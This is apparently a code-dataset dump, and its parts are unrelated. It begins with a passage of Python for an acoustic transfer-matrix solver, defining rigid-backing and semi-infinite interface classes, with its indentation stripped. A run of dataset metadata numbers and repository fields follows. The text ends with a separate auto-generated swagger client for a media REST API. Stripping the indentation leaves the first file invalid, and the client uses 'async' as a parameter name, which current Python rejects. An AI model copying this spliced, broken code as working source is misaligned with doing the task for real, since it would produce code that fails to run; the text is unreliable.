M[i_eq, self.layers[0].dofs[2]] = -SV_1[5, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[5, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[5, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[5, 5]
M[i_eq, self.layers[1].dofs[0]] = SV_2[3, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[3, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[3, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = SV_2[3, 3]*delta_1[1]
i_eq += 1
return i_eq
def transfert(self, O):
Omega_moins = np.zeros((6,3), dtype=np.complex)
Omega_moins[0,0:2] = O[0,0:2]
Omega_moins[1,0:2] = O[1,0:2]
Omega_moins[2,0:2] = O[1,0:2]
Omega_moins[3,0:2] = O[2,0:2]
Omega_moins[3,2] = 1
Omega_moins[4,2] = 1
Omega_moins[5,0:2] = O[3,0:2]
Tau_tilde = np.zeros((2,3), dtype=np.complex)
Tau_tilde[0,0] = 1
Tau_tilde[1,1] = 1
return (Omega_moins, Tau_tilde)
class FluidRigidBacking(PwInterface):
"""
Rigid backing for a fluid layer
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Rigid backing"
return out
def update_M_global(self, M, i_eq):
M[i_eq, self.layers[0].dofs[0]] = self.layers[0].SV[0, 0]*np.exp(self.layers[0].lam[0]*self.layers[0].d)
M[i_eq, self.layers[0].dofs[1]] = self.layers[0].SV[0, 1]
i_eq += 1
return i_eq
def Omega(self):
return np.array([0,1], dtype=np.complex)
class PemBacking(PwInterface):
"""
Rigid backing for a pem layer
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Rigid backing"
return out
def update_M_global(self, M, i_eq):
delta = np.exp(self.layers[0].lam*self.layers[0].d)
SV = self.layers[0].SV
M[i_eq, self.layers[0].dofs[0]] = SV[1, 0]*delta[0]
M[i_eq, self.layers[0].dofs[1]] = SV[1, 1]*delta[1]
M[i_eq, self.layers[0].dofs[2]] = SV[1, 2]*delta[2]
M[i_eq, self.layers[0].dofs[3]] = SV[1, 3]
M[i_eq, self.layers[0].dofs[4]] = SV[1, 4]
M[i_eq, self.layers[0].dofs[5]] = SV[1, 5]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV[2, 0]*delta[0]
M[i_eq, self.layers[0].dofs[1]] = SV[2, 1]*delta[1]
M[i_eq, self.layers[0].dofs[2]] = SV[2, 2]*delta[2]
M[i_eq, self.layers[0].dofs[3]] = SV[2, 3]
M[i_eq, self.layers[0].dofs[4]] = SV[2, 4]
M[i_eq, self.layers[0].dofs[5]] = SV[2, 5]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV[5, 0]*delta[0]
M[i_eq, self.layers[0].dofs[1]] = SV[5, 1]*delta[1]
M[i_eq, self.layers[0].dofs[2]] = SV[5, 2]*delta[2]
M[i_eq, self.layers[0].dofs[3]] = SV[5, 3]
M[i_eq, self.layers[0].dofs[4]] = SV[5, 4]
M[i_eq, self.layers[0].dofs[5]] = SV[5, 5]
i_eq += 1
return i_eq
def Omega(self):
Om = np.zeros((6,3), dtype=np.complex)
Om[0,1] = 1.
Om[3,2] = 1.
Om[4,0] = 1.
return Om
class ElasticBacking(PwInterface):
"""
Rigid backing for an elastic layer
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Rigid backing"
return out
def Omega(self):
Om = np.zeros((4,2), dtype=np.complex)
Om[0,1] = 1.
Om[2,0] = 1.
return Om
def update_M_global(self, M, i_eq):
delta = np.exp(self.layers[0].lam*self.layers[0].d)
SV = self.layers[0].SV
M[i_eq, self.layers[0].dofs[0]] = SV[1, 0]*delta[0]
M[i_eq, self.layers[0].dofs[1]] = SV[1, 1]*delta[1]
M[i_eq, self.layers[0].dofs[2]] = SV[1, 2]
M[i_eq, self.layers[0].dofs[3]] = SV[1, 3]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV[3, 0]*delta[0]
M[i_eq, self.layers[0].dofs[1]] = SV[3, 1]*delta[1]
M[i_eq, self.layers[0].dofs[2]] = SV[3, 2]
M[i_eq, self.layers[0].dofs[3]] = SV[3, 3]
i_eq += 1
return i_eq
class SemiInfinite(PwInterface):
"""
Semi-infinite boundary
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
self.medium = load_material("Air")
self.SV = None
def __str__(self):
out = "\t Semi-infinite transmission medium"
return out
def update_frequency(self, omega, kx):
self.medium.update_frequency(omega)
self.SV, self.lam = fluid_waves_TMM(self.medium, kx)
self.k = self.medium.k
self.kx = kx
self.omega = omega
def Omega(self):
if self.layers[0].medium.MEDIUM_TYPE in ["fluid", "eqf"]:
return np.array([-self.lam[0]/(self.medium.rho*self.omega**2), 1], dtype=np.complex), np.eye(1)
elif self.layers[0].medium.MEDIUM_TYPE == "elastic":
Om = np.zeros((4, 2), dtype=complex)
Om[1, 0] = -self.lam[0]/(self.medium.rho*self.omega**2)
Om[2, 0] = -1. # \sigma_{yy} is -p
Om[3, 1] = 1.
return Om, np.eye(2)
elif self.layers[0].medium.MEDIUM_TYPE == "pem":
Om = np.zeros((6, 3), dtype=complex)
Om[1, 1] = 1.
Om[2, 0] = -self.lam[0]/(self.medium.rho*self.omega**2)
Om[4, 0] = 1.
Om[5, 2] = 1.
return Om, np.eye(3)
def update_M_global(self, M, i_eq):
if self.layers[0].medium.MEDIUM_TYPE in ["fluid", "eqf"]:
delta_0 = np.exp(self.layers[0].lam[0]*self.layers[0].d)
M[i_eq, self.layers[0].dofs[0]] = self.layers[0].SV[0, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = self.layers[0].SV[0, 1]
M[i_eq, -1] = -self.SV[0, 0]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = self.layers[0].SV[1, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = self.layers[0].SV[1, 1]
M[i_eq, -1] = -self.SV[1, 0]
i_eq += 1
elif self.layers[0].medium.MEDIUM_TYPE == "pem":
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
SV_1 = self.layers[0].SV
M[i_eq, self.layers[0].dofs[0]] = -SV_1[2, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[2, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[2, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[2, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[2, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[2, 5]
M[i_eq, -1] = self.SV[0, 0]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = -SV_1[4, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[4, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[4, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[4, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[4, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[4, 5]
M[i_eq, -1] = self.SV[1, 0]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV_1[0, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[0, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[0, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[0, 3]
M[i_eq, self.layers[0].dofs[4]] = SV_1[0, 4]
M[i_eq, self.layers[0].dofs[5]] = SV_1[0, 5]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV_1[3, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[3, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[3, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[3, 3]
M[i_eq, self.layers[0].dofs[4]] = SV_1[3, 4]
M[i_eq, self.layers[0].dofs[5]] = SV_1[3, 5]
i_eq += 1
elif self.layers[0].medium.MEDIUM_TYPE == "elastic":
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
SV_1 = self.layers[0].SV
# Continuity of u_y
M[i_eq, self.layers[0].dofs[0]] = -SV_1[1, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[1, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[1, 2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[1, 3]
M[i_eq, -1] = self.SV[0, 0]
i_eq += 1
# sigma_yy = -p
M[i_eq, self.layers[0].dofs[0]] = SV_1[2, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[2, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[2, 2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[2, 3]
M[i_eq, -1] = self.SV[1, 0]
i_eq += 1
# sigma_xy = 0
M[i_eq, self.layers[0].dofs[0]] = -SV_1[0, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[0, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[0, 2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[0, 3]
i_eq += 1
return i_eq
| 40.869507
| 120
| 0.533998
| 5,911
| 30,693
| 2.590425
| 0.035358
| 0.2436
| 0.079415
| 0.14838
| 0.847048
| 0.831439
| 0.821121
| 0.809496
| 0.78716
| 0.778866
| 0
| 0.093328
| 0.259212
| 30,693
| 750
| 121
| 40.924
| 0.580112
| 0.055127
| 0
| 0.664407
| 0
| 0
| 0.01178
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09661
| false
| 0.00678
| 0.00678
| 0.00678
| 0.194915
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68a0c8f18ded78ad8da8ba8b9ba4b7f5ff54ab65
| 27,789
|
py
|
Python
|
general/tasks_importer/sdk/swagger_client/api/media_api.py
|
CitizenScienceCenter/c3s_tools
|
36479905ffbeb2bdabbc2be145dfe4fe7258ef5d
|
[
"Apache-2.0"
] | null | null | null |
general/tasks_importer/sdk/swagger_client/api/media_api.py
|
CitizenScienceCenter/c3s_tools
|
36479905ffbeb2bdabbc2be145dfe4fe7258ef5d
|
[
"Apache-2.0"
] | 1
|
2022-03-22T22:11:21.000Z
|
2022-03-22T22:11:21.000Z
|
general/tasks_importer/sdk/swagger_client/api/media_api.py
|
CitizenScienceCenter/c3s_tools
|
36479905ffbeb2bdabbc2be145dfe4fe7258ef5d
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
CCCS
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 0.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class MediaApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_medium(self, **kwargs): # noqa: E501
"""create_medium # noqa: E501
The media details (for files already on the server or remotely hosted) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_medium(async=True)
>>> result = thread.get()
:param async bool
:param media:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_medium_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_medium_with_http_info(**kwargs) # noqa: E501
return data
def create_medium_with_http_info(self, **kwargs): # noqa: E501
"""create_medium # noqa: E501
The media details (for files already on the server or remotely hosted) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_medium_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param media:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['media'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_medium" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'media' in params:
body_params = params['media']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/media', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_medium(self, id, **kwargs): # noqa: E501
"""Delete all media files related to source # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_medium(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: The unique identifier for an Object (i.e. User, Task, Project, Submission etc) (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_medium_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_medium_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_medium_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete all media files related to source # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_medium_with_http_info(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: The unique identifier for an Object (i.e. User, Task, Project, Submission etc) (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_medium" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_medium`") # noqa: E501
if 'id' in params and not re.search('^[a-zA-Z0-9-]+$', params['id']): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `delete_medium`, must conform to the pattern `/^[a-zA-Z0-9-]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/media/source/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_for_source(self, id, **kwargs): # noqa: E501
"""Query media for a specific task or project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_for_source(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: The unique identifier for an Object (i.e. User, Task, Project, Submission etc) (required)
:return: list[InlineResponse2002]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_for_source_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_for_source_with_http_info(id, **kwargs) # noqa: E501
return data
def get_for_source_with_http_info(self, id, **kwargs): # noqa: E501
"""Query media for a specific task or project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_for_source_with_http_info(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: The unique identifier for an Object (i.e. User, Task, Project, Submission etc) (required)
:return: list[InlineResponse2002]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_for_source" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_for_source`") # noqa: E501
if 'id' in params and not re.search('^[a-zA-Z0-9-]+$', params['id']): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `get_for_source`, must conform to the pattern `/^[a-zA-Z0-9-]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['anonUser', 'apiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/media/source/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[InlineResponse2002]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_media(self, **kwargs): # noqa: E501
"""get_media # noqa: E501
Get a list of media # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_media(async=True)
>>> result = thread.get()
:param async bool
:param str search_term:
:param int limit:
:return: list[InlineResponse2002]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_media_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_media_with_http_info(**kwargs) # noqa: E501
return data
def get_media_with_http_info(self, **kwargs): # noqa: E501
"""get_media # noqa: E501
Get a list of media # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_media_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str search_term:
:param int limit:
:return: list[InlineResponse2002]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['search_term', 'limit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_media" % key
)
params[key] = val
del params['kwargs']
if 'limit' in params and params['limit'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_media`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'search_term' in params:
query_params.append(('search_term', params['search_term'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['anonUser', 'apiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/media', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[InlineResponse2002]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_medium(self, id, **kwargs): # noqa: E501
"""Get a single file # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_medium(id, async=True)
>>> result = thread.get()
:param async bool
        :param str id: The unique identifier for an Object (i.e. User, Task, Project, Submission etc) (required)
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_medium_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_medium_with_http_info(id, **kwargs) # noqa: E501
return data
def get_medium_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a single file # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_medium_with_http_info(id, async=True)
>>> result = thread.get()
:param async bool
        :param str id: The unique identifier for an Object (i.e. User, Task, Project, Submission etc) (required)
:return: file
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_medium" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_medium`") # noqa: E501
if 'id' in params and not re.search('^[a-zA-Z0-9-]+$', params['id']): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `get_medium`, must conform to the pattern `/^[a-zA-Z0-9-]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['anonUser', 'apiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/media/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_medium(self, id, **kwargs): # noqa: E501
"""Put a single file # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_medium(id, async=True)
>>> result = thread.get()
:param async bool
        :param str id: The unique identifier for an Object (i.e. User, Task, Project, Submission etc) (required)
:param media:
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.update_medium_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.update_medium_with_http_info(id, **kwargs) # noqa: E501
return data
def update_medium_with_http_info(self, id, **kwargs): # noqa: E501
"""Put a single file # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_medium_with_http_info(id, async=True)
>>> result = thread.get()
:param async bool
        :param str id: The unique identifier for an Object (i.e. User, Task, Project, Submission etc) (required)
:param media:
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'media'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_medium" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `update_medium`") # noqa: E501
if 'id' in params and not re.search('^[a-zA-Z0-9-]+$', params['id']): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `update_medium`, must conform to the pattern `/^[a-zA-Z0-9-]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'media' in params:
body_params = params['media']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/media/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def upload(self, attachment, **kwargs): # noqa: E501
"""upload # noqa: E501
Add a new media attachment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.upload(attachment, async=True)
>>> result = thread.get()
:param async bool
:param file attachment: The file to be uploaded (required)
:param str id:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.upload_with_http_info(attachment, **kwargs) # noqa: E501
else:
(data) = self.upload_with_http_info(attachment, **kwargs) # noqa: E501
return data
def upload_with_http_info(self, attachment, **kwargs): # noqa: E501
"""upload # noqa: E501
Add a new media attachment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.upload_with_http_info(attachment, async=True)
>>> result = thread.get()
:param async bool
:param file attachment: The file to be uploaded (required)
:param str id:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['attachment', 'id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method upload" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'attachment' is set
if ('attachment' not in params or
params['attachment'] is None):
raise ValueError("Missing the required parameter `attachment` when calling `upload`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'attachment' in params:
local_var_files['attachment'] = params['attachment'] # noqa: E501
if 'id' in params:
form_params.append(('id', params['id'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/media/upload', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
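# --- Usage sketch (not part of the generated file) ---
# A minimal example of how the get_media/get_medium/update_medium/upload
# methods above are typically driven. The package name `swagger_client` and
# the `Configuration`, `ApiClient` and `MediaApi` names are assumptions based
# on common swagger-codegen output, and the API-key header name is
# hypothetical; only the method names and parameters come from the code above.
#
#   import swagger_client
#
#   configuration = swagger_client.Configuration()
#   configuration.api_key['X-API-KEY'] = 'my-secret-key'   # hypothetical header name
#   api = swagger_client.MediaApi(swagger_client.ApiClient(configuration))
#
#   # Synchronous call: returns the deserialized response body.
#   media = api.get_media(search_term='logo', limit=10)
#
#   # Asynchronous call: returns the request thread; .get() blocks for the result.
#   thread = api.get_medium('abc-123', async=True)
#   medium = thread.get()
#
#   # Multipart upload of a new attachment.
#   api.upload('/tmp/picture.png')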
